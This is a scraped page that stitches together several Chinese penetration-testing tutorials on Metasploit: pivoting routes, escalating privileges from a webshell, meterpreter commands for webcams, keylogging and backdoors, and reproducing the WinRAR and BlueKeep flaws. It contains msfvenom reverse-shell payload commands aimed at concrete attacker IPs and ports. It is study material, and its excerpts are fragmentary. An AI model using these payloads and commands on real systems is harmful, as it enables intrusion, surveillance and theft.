msf

后渗透阶段之基于MSF的路由转发

◇◆丶佛笑我妖孽 提交于 2019-12-01 13:51:16
目录 反弹MSF类型的Shell 添加内网路由 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由,直接使用MSF去访问原本不能直接访问的内网资源,只要路由可达了那么我们使用MSF来进行探测了。 我们现在有下面这个环境: Web服务器通过端口映射,对外提供Web服务。Web服务器上有两张网卡,内网分别还有其他两台服务器,一台开放了http服务,一台开放了SMB服务。拓扑图如下: 反弹MSF类型的Shell 我们通过web渗透,成功往Web服务器上上传了一句话木马,成功用菜刀连接。 然后我们现在想获得一个MSF类型的Shell。 我们先生成一个木马文件 msfvenom -p windows/meterpreter/reverse_tcp lhost= 112.74 .89 .58 lport= 42906 -f exe -o test.exe 用菜刀上传到Web服务器上,然后执行我们的木马程序,Kali成功获得反弹的MSF类型的shell。 添加内网路由 然后我们现在想要继续渗透内网。 我们先获取目标内网相关信息,可以看到该主机上的网卡有两个网段。 run get_local_subnets 如果我们不添加这两个网段路由的话,是探测不到这两个网段其他主机的。

网站提权之MSF骚操作

对着背影说爱祢 提交于 2019-12-01 13:47:36
当我们在进行web渗透测试的时候,拿到了webshell,但是在执行net user、whoami、类似的命令会发现怎么好像用不了,没有回显,权限不够,这可怎么办呐? 测试环境: 内网,没钱买服务器,而且还拿不到站,尴尬的事情😭 攻击者:parrotos 这个系统跟kali差不多 服务器:windows2003 那么,我们现在先来看看 使用msfvenom如何生成payload msfvenom 这个是一个什么东西就不用说了吧,玩过metasploit的都知道(表示我还是一个新手!!!),当然没玩过的自行谷歌,已经很多大佬跟我说过这个是渗透测试最基本的东西 在freebuf上面看到msfvenom命令行选项的中文翻译,我直接搬过来了,不犯法吧,哈哈哈!!! msfvenom命令行选项 Options: 12345678910111213141516171819 -p, --payload <payload> 指定需要使用的payload(攻击载荷)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all-n, --nopsled <length> 为payload预先指定一个NOP滑动长度-f, --format

后渗透之meterpreter使用攻略

邮差的信 提交于 2019-12-01 13:47:09
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有模块信息 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系统信息 ps # 查看当前活跃进程 kill <PID值> 杀死进程 idletime #查看目标机闲置时间 reboot / shutdown #重启/关机 shell #进入目标机cmd shell 2)uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl disable keyboard #禁用键盘 3)webcam摄像头命令 webcam_list #查看摄像头 webcam_snap #通过摄像头拍照 webcam_stream

渗透之——MSF提权

本小妞迷上赌 提交于 2019-12-01 06:18:08
在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe 然后在到MSF根据刚才配置的木马后门进行监听... 然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下 比如这里我吧abc.exe上传到了C:\users\leak\desktop\目录下, abc.exe就是我刚才生成的后门。 然后在执行我们的后门,可以看见MSF弹回了一个session 1(会话连接)。 说明我们后门程序成功执行起来了,当然你也可以在webshell执行的, 但必须的有一点执行的权限 getuid //可以看见我们的权限很低的,一般都是user权限的, 但也遇到过某些服务器执行后就直接是system最高权限。像这种我们就直接加用户啦。 这里我们是user权限,我们要把它提升到system权限。Windows最高权限 接着我们输入命令 background //把你当前的metasploit

WinRAR代码执行漏洞复现

爷,独闯天下 提交于 2019-12-01 05:06:37
漏洞介绍 WinRAR 是一款流行的解压缩工具,据其官网上发布的数据,全球有超过5亿的用户在使用 2019年2月20日,安全厂商 checkpoint 发布了名为《Extracting a 19 Year old code Execution from WinRAR》的文章,文章披露了一个存在于 winRAR 中用于 ace 文件解析的 DLL 模块中的绝对路径穿越漏洞,可导致远程代码执行。 漏洞类型:代码执行 漏洞利用条件:将压缩包解压到当前文件夹,同时释放恶意文件到指定目录,重启机器便会触发漏洞(解压到自启动目录 or 解压dll文件进行劫持) 受影响版本:WinRAR 5.7 之前含有UNACEV2.dll模块的压缩程序 产生原因:ace处理相关的DLL在对解压目标的相对路径进行解析时,CleanPath函数过滤不严导致 修复方案:升级到winrar5.7.1、 漏洞复现 环境准备: 吾爱破解上找的winrar 5.60版本 靶机:192.168.41.129 简体中文64位:http://www.win-rar.com/fileadmin/winrar-versions/sc20180711/wrr/winrar-x64-560sc.exe 简体中文32位:http://www.win-rar.com/fileadmin/winrar-versions/sc20180711

Nessus配置以及登录

天大地大妈咪最大 提交于 2019-11-30 21:13:42
在登录使用Nessus之前,首先需要启动nessus服务,,否则无法使用Nessus扫描工具,启动的命令如下: root@kali:~# service nessusd start 登录nessus root@kali:~# nessus_connect admin:admin@127.0.0.1:8834 Metasploit中Nessus所有命令(Nessus使用教程) 直接在Metasploit中扫描Nessus漏洞 对于那些我们选择留在命令行的情况,也可以选择直接从msfconsole连接到Nessus服务器。允许我们执行并导入漏洞扫描,而不是手动导入。 我们首先加载Nessus Bridge插件。 msf > load nessus [*] Nessus Bridge for Metasploit [*] Type nessus_help for a command listing [*] Successfully loaded plugin: Nessus 运行' nessus_help '会显示我们现在可以使用的msfconole命令。正如你所看到的,它功能非常全面。 msf > nessus_help Command Help Text ------- --------- 通 用 命 令 ----------------- -----------------

msf 信息收集

て烟熏妆下的殇ゞ 提交于 2019-11-30 12:03:36
MSF信息收集 转载自天堂空气 一 MSF主机发现 0x1:搜索arp 0x2:使用use auxiliary/scanner/discovery/arp_sweep 模块,然后show options. INTERFACE => 网卡接口 RHOSTS => 扫描的范围 SHOST => 伪造源IP SMAC=>伪造源MAC地址 THREADS=>线程 TIMEOUT=>超时5秒 0x3: run之后,查看hosts结果,扫描到以下主机 二 MSF端口扫描 0x1:搜索portscan模块。 0x2:使用auxiliary/scanner/portscan/syn 模块 设置RHOSTS为地址范围。 PORTS为要扫描的端口。 THREADS为线程 三 MSF密码嗅探 0x1: use auxiliary/sniffer/psnuffle (目前只支持pop3 imap ftp http get协议) 四 SMB服务扫描 0x1:SMB版本扫描 use auxiliary/scanner/smb/smb_version 0x2:扫描命名管道,判断SMB服务类型 use auxiliary/scanner/smb/pipe_auditor 五 SSH SSH版本扫描: use auxiliary/scanner/ssh/ssh_version SSH密码爆破 use

阅读《构建之法》提问

≯℡__Kan透↙ 提交于 2019-11-30 10:26:40
1.MSF开发模型从传统的瀑布模型和螺旋模型发展而来,并且MSF对敏捷和CMMI支持,那么,我们可以认为MSF模型是目前最好的开发模型吗? 2.什么项目适合敏捷开发?敏捷开发对比MSF开发有哪些值得学习的地方? 3.目前,获得用户需求的方式有焦点小组、深入面谈、卡片分类、用户调查问卷、用户日志研究、人类学调查、眼动跟踪测试、快速原调查、A/B测试。那么,在我们真正的软件开发中,在获取用户需求方面,我们主流的获取用户需求方式是什么? 4.项目经理人才的主要来源是来自于哪里?作为计算机专业的科班生,我们具备一定的专业能力,那么,我们刚去一家公司,可以担任他们的项目经理职位吗? 5.由于软件测试阶段可能检查不出产品的所有BUG就把软件交付给用户了,那么,我们可以认为软件测试是软件开发中容错率最高的环节吗? 来源: https://www.cnblogs.com/zhhzsc/p/11578790.html

浅谈MSF渗透测试

不想你离开。 提交于 2019-11-30 07:13:56
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。 前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。 下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。 信息收集 发现目标网段的存活主机: 我们可以利用auxiliary这个模块来获取目标网端的信息,包括端口开放情况、主机存活情况。 auxiliary/scanner/discovery/arp_sweep auxiliary/scancer/smb/smb_version 存活的445主机 auxiliary/scanner/portscan/syn 端口扫描 auxiliary/scanner/telnet/telnet_version telent服务扫描 auxiliary/scanner/rdp/rdp_scanner 远程桌面服务扫描 auxiliary/scanner/ssh/ssh_version ssh主机扫描 。。。。。。

为什么0708总是复现不成功

三世轮回 提交于 2019-11-29 23:36:31
#之前写的哪篇文章感觉不太好。 0x01:   报错信息为:[-] 10.211.55.8:3389 - Exploit failed: NameError undefined local variable or method `rdp_connect' for #<Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00007f9c251837b0> 截图如下 报如上错误,说明你需要在msf中更新如下四个文件: 文件下载地址: https://github.com/rapid7/metasploit-framework/pull/12283/files?file-filters%5B%5D=.rb%20 0x02: 替换后提示找不到文件 替换了之后即使是使用 reload_all 重新加载也提示找不到文件 你需要更新 msf 到最新版本,实在不行删了 ( 一般 msf 在 opt 目录下 ) 重装,简单粗暴; 安装命令: 1、curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers